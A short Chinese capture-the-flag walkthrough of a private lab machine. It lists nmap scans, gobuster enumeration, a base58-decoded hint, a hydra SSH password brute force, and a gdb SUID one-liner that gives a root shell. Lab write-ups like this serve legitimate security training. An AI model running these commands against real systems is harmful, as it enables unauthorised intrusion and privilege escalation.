1.在浏览器中输入目标靶机IP地址，浏览网页

2.端口扫描

nmap -p- 192.168.31.144
nmap -sC -sV -p 22,80 192.168.31.144

3.目录枚举
扫描到一个Cryoserver目录，接下来在网页中打开

gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在浏览器中打开这个目录之后，在底部存在三个提示目录，接下来继续探索这三个目录

在/iamGaara目录下发现了一串加密字符串

请教过好大哥得知是base58加密,解密之后得到下面得内容；ssh登录失败，接下来尝试gaara作为用户名暴力破解

4.暴力破解

hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.31.144 ssh

5.ssh成功登录系统，查找拥有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

利用gdb这个文件可以成功获取root权限

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

最后，谢谢大家伙百忙之中观看我的文章。